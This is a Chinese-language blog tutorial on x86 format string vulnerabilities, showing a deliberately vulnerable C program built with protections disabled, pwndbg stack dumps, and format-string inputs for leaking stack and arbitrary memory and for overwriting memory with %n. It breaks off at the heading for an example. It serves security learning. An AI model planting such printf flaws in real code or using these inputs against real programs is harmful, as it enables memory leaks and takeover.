<!DOCTYPE html>
<html lang=zh>
<head>
    <!-- so meta -->
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="HandheldFriendly" content="True">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=5" />
    <meta name="description" content="格式化字符串漏洞进阶（x86）程序源码： 12345678910#include&lt;stdio.h&gt;int main(void)&#123;	char s[100];	int a &#x3D;1 ,b &#x3D;0x22222222, c&#x3D;-1;	scanf(&quot;%s&quot;,s);	printf(&quot;%08x.%08x.%08x.%s\n&quot;,a,b,c,s);	printf">
<meta property="og:type" content="article">
<meta property="og:title" content="Hello~ lpp">
<meta property="og:url" content="http://example.com/2024/09/16/%E6%A0%BC%E5%BC%8F%E5%8C%96%E5%AD%97%E7%AC%A6%E4%B8%B2%E6%BC%8F%E6%B4%9E%E8%BF%9B%E9%98%B6%EF%BC%88x86%EF%BC%89%E7%90%86%E8%AE%BA%E5%8F%AF%E8%A1%8C%E6%8A%A5%E6%AE%B5%E9%94%99%E8%AF%AF%E5%BE%85%E4%BF%AE%E6%AD%A3/index.html">
<meta property="og:site_name" content="Hello~ lpp">
<meta property="og:description" content="格式化字符串漏洞进阶（x86）程序源码： 12345678910#include&lt;stdio.h&gt;int main(void)&#123;	char s[100];	int a &#x3D;1 ,b &#x3D;0x22222222, c&#x3D;-1;	scanf(&quot;%s&quot;,s);	printf(&quot;%08x.%08x.%08x.%s\n&quot;,a,b,c,s);	printf">
<meta property="og:locale" content="zh_CN">
<meta property="article:published_time" content="2024-09-16T09:51:33.433Z">
<meta property="article:modified_time" content="2024-08-30T03:04:08.194Z">
<meta property="article:author" content="luyanpei">
<meta name="twitter:card" content="summary">
    
    
      
        
          <link rel="shortcut icon" href="/images/favicon.ico">
        
      
      
        
          <link rel="icon" type="image/png" href="/images/favicon-192x192.png" sizes="192x192">
        
      
      
        
          <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">
        
      
    
    <!-- title -->
    <title>Hello~ lpp</title>
    <!-- async scripts -->
    <!-- Google Analytics -->


    <!-- Umami Analytics -->


    <!-- styles -->
    
<link rel="stylesheet" href="/css/style.css">

    <!-- persian styles -->
    
    <!-- rss -->
    
    
	<!-- mathjax -->
	
<meta name="generator" content="Hexo 7.3.0"></head>

<body class="max-width mx-auto px3 ltr">
    
      <div id="header-post">
  <a id="menu-icon" href="#" aria-label="目录"><i class="fa-solid fa-bars fa-lg"></i></a>
  <a id="menu-icon-tablet" href="#" aria-label="目录"><i class="fa-solid fa-bars fa-lg"></i></a>
  <a id="top-icon-tablet" href="#" aria-label="顶部" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');" style="display:none;"><i class="fa-solid fa-chevron-up fa-lg"></i></a>
  <span id="menu">
    <span id="nav">
      <ul>
        <!--
       --><li><a href="/">首页</a></li><!--
     --><!--
       --><li><a href="/about/">关于</a></li><!--
     --><!--
       --><li><a href="/archives/">归档</a></li><!--
     --><!--
       --><li><a target="_blank" rel="noopener" href="http://github.com/probberechts">项目</a></li><!--
     -->
      </ul>
    </span>
    <br/>
    <span id="actions">
      <ul>
        
        <li><a class="icon" aria-label="上一篇" href="/2024/09/16/%E6%A0%BC%E5%BC%8F%E5%8C%96%E5%AD%97%E7%AC%A6%E4%B8%B2%E6%B3%84%E9%9C%B2canary%E5%9C%B0%E5%9D%80%EF%BC%88%E4%BE%8B%E9%A2%98%EF%BC%89/"><i class="fa-solid fa-chevron-left" aria-hidden="true" onmouseover="$('#i-prev').toggle();" onmouseout="$('#i-prev').toggle();"></i></a></li>
        
        
        <li><a class="icon" aria-label="下一篇" href="/2024/09/16/%E6%A0%BC%E5%BC%8F%E5%8C%96%E5%AD%97%E7%AC%A6%E4%B8%B2%E6%BC%8F%E6%B4%9E(x64)/"><i class="fa-solid fa-chevron-right" aria-hidden="true" onmouseover="$('#i-next').toggle();" onmouseout="$('#i-next').toggle();"></i></a></li>
        
        <li><a class="icon" aria-label="返回顶部" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fa-solid fa-chevron-up" aria-hidden="true" onmouseover="$('#i-top').toggle();" onmouseout="$('#i-top').toggle();"></i></a></li>
        <li><a class="icon" aria-label="分享文章" href="#"><i class="fa-solid fa-share-alt" aria-hidden="true" onmouseover="$('#i-share').toggle();" onmouseout="$('#i-share').toggle();" onclick="$('#share').toggle();return false;"></i></a></li>
      </ul>
      <span id="i-prev" class="info" style="display:none;">上一篇</span>
      <span id="i-next" class="info" style="display:none;">下一篇</span>
      <span id="i-top" class="info" style="display:none;">返回顶部</span>
      <span id="i-share" class="info" style="display:none;">分享文章</span>
    </span>
    <br/>
    <div id="share" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=http://example.com/2024/09/16/%E6%A0%BC%E5%BC%8F%E5%8C%96%E5%AD%97%E7%AC%A6%E4%B8%B2%E6%BC%8F%E6%B4%9E%E8%BF%9B%E9%98%B6%EF%BC%88x86%EF%BC%89%E7%90%86%E8%AE%BA%E5%8F%AF%E8%A1%8C%E6%8A%A5%E6%AE%B5%E9%94%99%E8%AF%AF%E5%BE%85%E4%BF%AE%E6%AD%A3/"><i class="fab fa-facebook " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=http://example.com/2024/09/16/%E6%A0%BC%E5%BC%8F%E5%8C%96%E5%AD%97%E7%AC%A6%E4%B8%B2%E6%BC%8F%E6%B4%9E%E8%BF%9B%E9%98%B6%EF%BC%88x86%EF%BC%89%E7%90%86%E8%AE%BA%E5%8F%AF%E8%A1%8C%E6%8A%A5%E6%AE%B5%E9%94%99%E8%AF%AF%E5%BE%85%E4%BF%AE%E6%AD%A3/&text="><i class="fab fa-twitter " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=http://example.com/2024/09/16/%E6%A0%BC%E5%BC%8F%E5%8C%96%E5%AD%97%E7%AC%A6%E4%B8%B2%E6%BC%8F%E6%B4%9E%E8%BF%9B%E9%98%B6%EF%BC%88x86%EF%BC%89%E7%90%86%E8%AE%BA%E5%8F%AF%E8%A1%8C%E6%8A%A5%E6%AE%B5%E9%94%99%E8%AF%AF%E5%BE%85%E4%BF%AE%E6%AD%A3/&title="><i class="fab fa-linkedin " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=http://example.com/2024/09/16/%E6%A0%BC%E5%BC%8F%E5%8C%96%E5%AD%97%E7%AC%A6%E4%B8%B2%E6%BC%8F%E6%B4%9E%E8%BF%9B%E9%98%B6%EF%BC%88x86%EF%BC%89%E7%90%86%E8%AE%BA%E5%8F%AF%E8%A1%8C%E6%8A%A5%E6%AE%B5%E9%94%99%E8%AF%AF%E5%BE%85%E4%BF%AE%E6%AD%A3/&is_video=false&description="><i class="fab fa-pinterest " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=&body=Check out this article: http://example.com/2024/09/16/%E6%A0%BC%E5%BC%8F%E5%8C%96%E5%AD%97%E7%AC%A6%E4%B8%B2%E6%BC%8F%E6%B4%9E%E8%BF%9B%E9%98%B6%EF%BC%88x86%EF%BC%89%E7%90%86%E8%AE%BA%E5%8F%AF%E8%A1%8C%E6%8A%A5%E6%AE%B5%E9%94%99%E8%AF%AF%E5%BE%85%E4%BF%AE%E6%AD%A3/"><i class="fa-solid fa-envelope " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=http://example.com/2024/09/16/%E6%A0%BC%E5%BC%8F%E5%8C%96%E5%AD%97%E7%AC%A6%E4%B8%B2%E6%BC%8F%E6%B4%9E%E8%BF%9B%E9%98%B6%EF%BC%88x86%EF%BC%89%E7%90%86%E8%AE%BA%E5%8F%AF%E8%A1%8C%E6%8A%A5%E6%AE%B5%E9%94%99%E8%AF%AF%E5%BE%85%E4%BF%AE%E6%AD%A3/&title="><i class="fab fa-get-pocket " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=http://example.com/2024/09/16/%E6%A0%BC%E5%BC%8F%E5%8C%96%E5%AD%97%E7%AC%A6%E4%B8%B2%E6%BC%8F%E6%B4%9E%E8%BF%9B%E9%98%B6%EF%BC%88x86%EF%BC%89%E7%90%86%E8%AE%BA%E5%8F%AF%E8%A1%8C%E6%8A%A5%E6%AE%B5%E9%94%99%E8%AF%AF%E5%BE%85%E4%BF%AE%E6%AD%A3/&title="><i class="fab fa-reddit " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=http://example.com/2024/09/16/%E6%A0%BC%E5%BC%8F%E5%8C%96%E5%AD%97%E7%AC%A6%E4%B8%B2%E6%BC%8F%E6%B4%9E%E8%BF%9B%E9%98%B6%EF%BC%88x86%EF%BC%89%E7%90%86%E8%AE%BA%E5%8F%AF%E8%A1%8C%E6%8A%A5%E6%AE%B5%E9%94%99%E8%AF%AF%E5%BE%85%E4%BF%AE%E6%AD%A3/&title="><i class="fab fa-stumbleupon " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=http://example.com/2024/09/16/%E6%A0%BC%E5%BC%8F%E5%8C%96%E5%AD%97%E7%AC%A6%E4%B8%B2%E6%BC%8F%E6%B4%9E%E8%BF%9B%E9%98%B6%EF%BC%88x86%EF%BC%89%E7%90%86%E8%AE%BA%E5%8F%AF%E8%A1%8C%E6%8A%A5%E6%AE%B5%E9%94%99%E8%AF%AF%E5%BE%85%E4%BF%AE%E6%AD%A3/&title="><i class="fab fa-digg " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=http://example.com/2024/09/16/%E6%A0%BC%E5%BC%8F%E5%8C%96%E5%AD%97%E7%AC%A6%E4%B8%B2%E6%BC%8F%E6%B4%9E%E8%BF%9B%E9%98%B6%EF%BC%88x86%EF%BC%89%E7%90%86%E8%AE%BA%E5%8F%AF%E8%A1%8C%E6%8A%A5%E6%AE%B5%E9%94%99%E8%AF%AF%E5%BE%85%E4%BF%AE%E6%AD%A3/&name=&description="><i class="fab fa-tumblr " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=http://example.com/2024/09/16/%E6%A0%BC%E5%BC%8F%E5%8C%96%E5%AD%97%E7%AC%A6%E4%B8%B2%E6%BC%8F%E6%B4%9E%E8%BF%9B%E9%98%B6%EF%BC%88x86%EF%BC%89%E7%90%86%E8%AE%BA%E5%8F%AF%E8%A1%8C%E6%8A%A5%E6%AE%B5%E9%94%99%E8%AF%AF%E5%BE%85%E4%BF%AE%E6%AD%A3/&t="><i class="fab fa-hacker-news " aria-hidden="true"></i></a></li>
</ul>

    </div>
    
    
      <div id="toc">
        <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%A0%BC%E5%BC%8F%E5%8C%96%E5%AD%97%E7%AC%A6%E4%B8%B2%E6%BC%8F%E6%B4%9E%E8%BF%9B%E9%98%B6%EF%BC%88x86%EF%BC%89"><span class="toc-number">1.</span> <span class="toc-text">格式化字符串漏洞进阶（x86）</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E8%8E%B7%E5%8F%96%E6%A0%88%E5%8F%98%E9%87%8F%E5%AF%B9%E5%BA%94%E7%9A%84%E5%AD%97%E7%AC%A6%E4%B8%B2"><span class="toc-number">1.0.1.</span> <span class="toc-text">获取栈变量对应的字符串</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E6%B3%84%E9%9C%B2%E4%BB%BB%E6%84%8F%E5%9C%B0%E5%9D%80%E5%86%85%E5%AD%98"><span class="toc-number">1.0.2.</span> <span class="toc-text">泄露任意地址内存</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E8%A6%86%E7%9B%96%E5%86%85%E5%AD%98"><span class="toc-number">1.0.3.</span> <span class="toc-text">覆盖内存</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E8%A6%86%E7%9B%96%E6%A0%88%E5%86%85%E5%AD%98"><span class="toc-number">1.0.4.</span> <span class="toc-text">覆盖栈内存</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E8%A6%86%E7%9B%96%E4%BB%BB%E6%84%8F%E5%9C%B0%E5%9D%80%E5%86%85%E5%AD%98"><span class="toc-number">1.0.5.</span> <span class="toc-text">覆盖任意地址内存</span></a><ol class="toc-child"><li class="toc-item toc-level-5"><a class="toc-link" href="#%E8%A6%86%E7%9B%96%E5%B0%8F%E6%95%B0%E5%AD%97"><span class="toc-number">1.0.5.1.</span> <span class="toc-text">覆盖小数字:</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#%E8%A6%86%E7%9B%96%E5%A4%A7%E6%95%B0%E5%AD%97%EF%BC%9A"><span class="toc-number">1.0.5.2.</span> <span class="toc-text">覆盖大数字：</span></a></li></ol></li></ol></li></ol></li></ol>
      </div>
    
  </span>
</div>

    
    <div class="content index py4 ">
        
        <article class="post h-entry" itemscope itemtype="http://schema.org/BlogPosting">
  <header>
    
    <h1 class="posttitle p-name" itemprop="name headline">
        
    </h1>



    <div class="meta">
      <span class="author p-author h-card" itemprop="author" itemscope itemtype="http://schema.org/Person">
        <span class="p-name" itemprop="name">luyanpei</span>
      </span>
      
    <div class="postdate">
      
        <time datetime="2024-09-16T09:51:33.433Z" class="dt-published" itemprop="datePublished">2024-09-16</time>
        
      
    </div>


      

      

    </div>
  </header>
  

  <div class="content e-content" itemprop="articleBody">
    <h2 id="格式化字符串漏洞进阶（x86）"><a href="#格式化字符串漏洞进阶（x86）" class="headerlink" title="格式化字符串漏洞进阶（x86）"></a>格式化字符串漏洞进阶（x86）</h2><p>程序源码：</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><code class="hljs c"><span class="hljs-meta">#<span class="hljs-keyword">include</span><span class="hljs-string">&lt;stdio.h&gt;</span></span><br><span class="hljs-type">int</span> <span class="hljs-title function_">main</span><span class="hljs-params">(<span class="hljs-type">void</span>)</span><br>&#123;<br>	<span class="hljs-type">char</span> s[<span class="hljs-number">100</span>];<br>	<span class="hljs-type">int</span> a =<span class="hljs-number">1</span> ,b =<span class="hljs-number">0x22222222</span>, c=<span class="hljs-number">-1</span>;<br>	<span class="hljs-built_in">scanf</span>(<span class="hljs-string">&quot;%s&quot;</span>,s);<br>	<span class="hljs-built_in">printf</span>(<span class="hljs-string">&quot;%08x.%08x.%08x.%s\n&quot;</span>,a,b,c,s);<br>	<span class="hljs-built_in">printf</span>(s);<br>	<span class="hljs-keyword">return</span> <span class="hljs-number">0</span>;<br>&#125;<br></code></pre></td></tr></table></figure>

<p>编译命令：gcc -m32 -fno-stack-protector -no -pie -o 1 1.c</p>
<p>通过gdb打开程序在printf处下断点，输入%08x.%08x.%08x</p>
<p>运行之后，程序停在printf处,此时栈空间</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><code class="hljs asm">00:0000│ esp 0xffffcfac —▸ 0x80491ea (main+100) ◂— add esp, 0x20<br>01:0004│-098 0xffffcfb0 —▸ 0x804a00b ◂— &#x27;%08x.%08x.%08x.%s\n&#x27;<br>02:0008│-094 0xffffcfb4 ◂— 0x1<br>03:000c│-090 0xffffcfb8 ◂— 0x22222222 (&#x27;&quot;&quot;&quot;&quot;&#x27;)<br>04:0010│-08c 0xffffcfbc ◂— 0xffffffff<br>05:0014│-088 0xffffcfc0 —▸ 0xffffcfd0 ◂— &#x27;%08x.%08x.%08x&#x27;<br>06:0018│-084 0xffffcfc4 —▸ 0xffffcfd0 ◂— &#x27;%08x.%08x.%08x&#x27;<br>07:001c│-080 0xffffcfc8 —▸ 0xf7fbe7b0 —▸ 0x80482c2 ◂— &#x27;GLIBC_2.34&#x27;<br></code></pre></td></tr></table></figure>

<p>0xffffcfac：printf返回地址</p>
<p>0xffffcfb0：格式化字符串，%08x.%08x.%08x.%s</p>
<p>格式化字符串的第一个%08x解析的是0x1，第二个%08x解析的是0x22222222，第三个%08x解析的是-1，第四个%s解析的是我们输入的“%08x.%08x.%08x”字符串</p>
<p>c继续运行，程序停在下一个printf：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><code class="hljs asm">00:0000│ esp 0xffffcfbc —▸ 0x80491f9 (main+115) ◂— add esp, 0x10<br>01:0004│-088 0xffffcfc0 —▸ 0xffffcfd0 ◂— &#x27;%08x.%08x.%08x&#x27;<br>02:0008│-084 0xffffcfc4 —▸ 0xffffcfd0 ◂— &#x27;%08x.%08x.%08x&#x27;<br>03:000c│-080 0xffffcfc8 —▸ 0xf7fbe7b0 —▸ 0x80482c2 ◂— &#x27;GLIBC_2.34&#x27;<br>04:0010│-07c 0xffffcfcc —▸ 0x804919d (main+23) ◂— add ebx, 0x2e63<br>05:0014│ eax 0xffffcfd0 ◂— &#x27;%08x.%08x.%08x&#x27;<br>06:0018│-074 0xffffcfd4 ◂— &#x27;.%08x.%08x&#x27;<br>07:001c│-070 0xffffcfd8 ◂— &#x27;x.%08x&#x27;<br></code></pre></td></tr></table></figure>

<p>由于第二次printf没有给参数，触发了格式化字符串漏洞，看到格式化字符串第一个%08x解析的是0xffffcfd0，第二个解析的是0xf7fbe7b0 ，第三个解析的是0x804919d</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs asm">pwndbg&gt; c<br>Continuing.<br>ffffcfd0.f7fbe7b0.0804919d[Inferior 1 (process 4316) exited normally]<br></code></pre></td></tr></table></figure>

<p>和预测的一样</p>
<p>不只可以用%x%x%x还可以用%p来获取数据：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs asm">lpp@lpp-virtual-machine:~/test$ ./0<br>%p.%p.%p <br>00000001.22222222.ffffffff.%p.%p.%p<br>0xffaf3400.0xe88767b0.0x804919d<br></code></pre></td></tr></table></figure>

<p>由于栈上的数据会因为每次分配的内存页不同，并不是每次得到的结果都一样，上面的方法一直都是依次输出栈中的每个参数，要输入一个特定位置的内容就需要更改一下输入的内容。即：</p>
<figure class="highlight cos"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs cos"><span class="hljs-built_in">%n</span><span class="hljs-built_in">$x</span><br></code></pre></td></tr></table></figure>

<p>第二次实验：</p>
<p>gdb打开程序，在printf处下断点</p>
<p>栈空间：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><code class="hljs asm">00:0000│ esp 0xffffcfbc —▸ 0x80491f9 (main+115) ◂— add esp, 0x10<br>01:0004│-088 0xffffcfc0 —▸ 0xffffcfd0 ◂— &#x27;%3$x&#x27;<br>02:0008│-084 0xffffcfc4 —▸ 0xffffcfd0 ◂— &#x27;%3$x&#x27;<br>03:000c│-080 0xffffcfc8 —▸ 0xf7fbe7b0 —▸ 0x80482c2 ◂— &#x27;GLIBC_2.34&#x27;<br>04:0010│-07c 0xffffcfcc —▸ 0x804919d (main+23) ◂— add ebx, 0x2e63<br>05:0014│ eax 0xffffcfd0 ◂— &#x27;%3$x&#x27;<br>06:0018│-074 0xffffcfd4 ◂— 0x0<br>07:001c│-070 0xffffcfd8 —▸ 0xf7ffda40 ◂— 0x0<br></code></pre></td></tr></table></figure>

<p>正常输出</p>
<figure class="highlight llvm"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs llvm">pwndbg&gt; <span class="hljs-keyword">c</span><br>Continuing.<br><span class="hljs-number">00000001.22222222</span>.ffffffff.<span class="hljs-variable">%3</span>$<span class="hljs-keyword">x</span><br></code></pre></td></tr></table></figure>

<p>继续c，看printf(s)处会发生什么，按所输入的%3$x来说，应该会解析格式化字符串函数下面第三个参数也就是下面所说的0x804919d</p>
<figure class="highlight apache"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><code class="hljs apache"><span class="hljs-attribute">00</span>:<span class="hljs-number">0000</span>│ esp <span class="hljs-number">0</span>xffffcfbc —▸ <span class="hljs-number">0</span>x80491f9 (main+<span class="hljs-number">115</span>) ◂— add esp, <span class="hljs-number">0</span>x10<br><span class="hljs-attribute">01</span>:<span class="hljs-number">0004</span>│-<span class="hljs-number">088</span> <span class="hljs-number">0</span>xffffcfc0 —▸ <span class="hljs-number">0</span>xffffcfd0 ◂— &#x27;%<span class="hljs-number">3</span>$x&#x27;//格式化字符串位置<br><span class="hljs-attribute">02</span>:<span class="hljs-number">0008</span>│-<span class="hljs-number">084</span> <span class="hljs-number">0</span>xffffcfc4 —▸ <span class="hljs-number">0</span>xffffcfd0 ◂— &#x27;%<span class="hljs-number">3</span>$x&#x27;//第一个<br><span class="hljs-attribute">03</span>:<span class="hljs-number">000</span>c│-<span class="hljs-number">080</span> <span class="hljs-number">0</span>xffffcfc8 —▸ <span class="hljs-number">0</span>xf7fbe7b0 —▸ <span class="hljs-number">0</span>x80482c2 ◂— &#x27;GLIBC_2.<span class="hljs-number">34</span>&#x27;//第二个<br><span class="hljs-attribute">04</span>:<span class="hljs-number">0010</span>│-<span class="hljs-number">07</span>c <span class="hljs-number">0</span>xffffcfcc —▸ <span class="hljs-number">0</span>x804919d (main+<span class="hljs-number">23</span>) ◂— add ebx, <span class="hljs-number">0</span>x2e63//第三个<br><span class="hljs-attribute">05</span>:<span class="hljs-number">0014</span>│ eax <span class="hljs-number">0</span>xffffcfd0 ◂— &#x27;%<span class="hljs-number">3</span>$x&#x27;<br><span class="hljs-attribute">06</span>:<span class="hljs-number">0018</span>│-<span class="hljs-number">074</span> <span class="hljs-number">0</span>xffffcfd4 ◂— <span class="hljs-number">0</span>x0<br><span class="hljs-attribute">07</span>:<span class="hljs-number">001</span>c│-<span class="hljs-number">070</span> <span class="hljs-number">0</span>xffffcfd8 —▸ <span class="hljs-number">0</span>xf7ffda40 ◂— <span class="hljs-number">0</span>x0<br></code></pre></td></tr></table></figure>

<p>输出：（跟预想的一致）</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs asm">pwndbg&gt; c<br>Continuing.<br>804919d[Inferior 1 (process 4347) exited normally]<br></code></pre></td></tr></table></figure>

<p>如果是%2$x就是输出格式化字符串指令的下面的第二个参数</p>
<figure class="highlight x86asm"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><code class="hljs x86asm"><span class="hljs-number">00</span>:<span class="hljs-number">0000</span>│ <span class="hljs-built_in">esp</span> <span class="hljs-number">0xffffcfbc</span> —▸ <span class="hljs-number">0x80491f9</span> (main+<span class="hljs-number">115</span>) ◂— <span class="hljs-keyword">add</span> <span class="hljs-built_in">esp</span>, <span class="hljs-number">0x10</span><br><span class="hljs-number">01</span>:<span class="hljs-number">0004</span>│-<span class="hljs-number">088</span> <span class="hljs-number">0xffffcfc0</span> —▸ <span class="hljs-number">0xffffcfd0</span> ◂— <span class="hljs-string">&#x27;%2$x&#x27;</span><br><span class="hljs-number">02</span>:<span class="hljs-number">0008</span>│-<span class="hljs-number">084</span> <span class="hljs-number">0xffffcfc4</span> —▸ <span class="hljs-number">0xffffcfd0</span> ◂— <span class="hljs-string">&#x27;%2$x&#x27;</span><br><span class="hljs-number">03</span>:000c│-<span class="hljs-number">080</span> <span class="hljs-number">0xffffcfc8</span> —▸ <span class="hljs-number">0xf7fbe7b0</span> —▸ <span class="hljs-number">0x80482c2</span> ◂— <span class="hljs-string">&#x27;GLIBC_2.34&#x27;</span><br><span class="hljs-number">04</span>:<span class="hljs-number">0010</span>│-07c <span class="hljs-number">0xffffcfcc</span> —▸ <span class="hljs-number">0x804919d</span> (main+<span class="hljs-number">23</span>) ◂— <span class="hljs-keyword">add</span> <span class="hljs-built_in">ebx</span>, <span class="hljs-number">0x2e63</span><br><span class="hljs-number">05</span>:<span class="hljs-number">0014</span>│ <span class="hljs-built_in">eax</span> <span class="hljs-number">0xffffcfd0</span> ◂— <span class="hljs-string">&#x27;%2$x&#x27;</span><br><span class="hljs-number">06</span>:<span class="hljs-number">0018</span>│-<span class="hljs-number">074</span> <span class="hljs-number">0xffffcfd4</span> ◂— <span class="hljs-number">0x0</span><br><span class="hljs-number">07</span>:001c│-<span class="hljs-number">070</span> <span class="hljs-number">0xffffcfd8</span> —▸ <span class="hljs-number">0xf7ffda40</span> ◂— <span class="hljs-number">0x0</span><br><br> ► <span class="hljs-number">0</span> <span class="hljs-number">0xf7c57a90</span> printf<br>   <span class="hljs-number">1</span> <span class="hljs-number">0x80491f9</span> main+<span class="hljs-number">115</span><br>   <span class="hljs-number">2</span> <span class="hljs-number">0xf7c21519</span> __libc_start_call_main+<span class="hljs-number">121</span><br>   <span class="hljs-number">3</span> <span class="hljs-number">0xf7c215f3</span> __libc_start_main+<span class="hljs-number">147</span><br>   <span class="hljs-number">4</span> <span class="hljs-number">0x804909c</span> _start+<span class="hljs-number">44</span><br>   <br>────────────────────────────────────────────────────────────────────────────────────────────────────────────<br>pwndbg&gt; c<br>Continuing.<br>f7fbe7b0[Inferior <span class="hljs-number">1</span> (process <span class="hljs-number">4493</span>) exited normally]<br><br></code></pre></td></tr></table></figure>

<p>但是我们实际上输出的是printf的第四个参数，因为格式化字符串就是printfi函数的其中一个参数。这样我们就可以不用遍历整个栈，能够指定输出某个栈上的内容。</p>
<h4 id="获取栈变量对应的字符串"><a href="#获取栈变量对应的字符串" class="headerlink" title="获取栈变量对应的字符串"></a>获取栈变量对应的字符串</h4><p>其实就是把前面格式化字符串的x改成s就行，%s会以字符串的形式输出栈地址中的内容 </p>
<p>小技巧总结：<br>    利用%x来获取对应栈的内存，但建议使用%p,可以不用考虑位数的区别。<br>    利用%s来获取变量所对应地址的内容，只不过有零截断。<br>    利用%order$x来获取指定参数的值，利用%order$s来获取指定参数对应地址的内容。</p>
<h4 id="泄露任意地址内存"><a href="#泄露任意地址内存" class="headerlink" title="泄露任意地址内存"></a>泄露任意地址内存</h4><p>如果我们想要泄露某个libc函数的got表内容，从而得到其地址，进而获取libc版本以及其他函数的地址，这时候能够完全控制泄露某个指定地址的内存就很重要了，一般来说在格式化字符串漏洞中，我们读取的格式化字符串都在栈上，也就是说在调用输出函数的时候，其实第一个参数的地址就是该格式化字符串的地址</p>
<p>由于可以控制格式化字符串，所以只要知道格式化字符串在输出函数调用时是第几个参数，假设改格式化字符串相对函数调用为第k个参数，就可以通过addr%k$s</p>
<h4 id="覆盖内存"><a href="#覆盖内存" class="headerlink" title="覆盖内存"></a>覆盖内存</h4><p>前面可以通过格式化字符串来泄露栈内存以及任意内存地址，也可以进行覆盖内存，直接修改栈上变量的值，需要一个东西有能写的能力，这里就用上了%n</p>
<figure class="highlight haml"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs haml"><span class="hljs-tag">%<span class="hljs-selector-tag">n</span></span>:不输出字符，但是把已经成功输出的字符个数写入对应的整形指针参数所指的变量。<br></code></pre></td></tr></table></figure>

<figure class="highlight excel"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs excel">%<span class="hljs-built_in">n</span>需要这样用：<br>...[overwrite addr ]...%[ oxerwrite <span class="hljs-built_in">offset</span> ]$<span class="hljs-built_in">n</span><br></code></pre></td></tr></table></figure>

<p>其中…表示我们的填充内容，overwrite addr表示我们所要覆盖的地址，overwrite offset地址表示我们所要覆盖的地址储存的位置为输出函数的格式化字符串的第几个参数</p>
<p>一般来说，利用分为以下几个步骤：</p>
<p>1.确定覆盖地址</p>
<p>2.确定相对偏移（找格式化字符串的第几个参数）</p>
<p>3.进行覆盖</p>
<p>例子：</p>
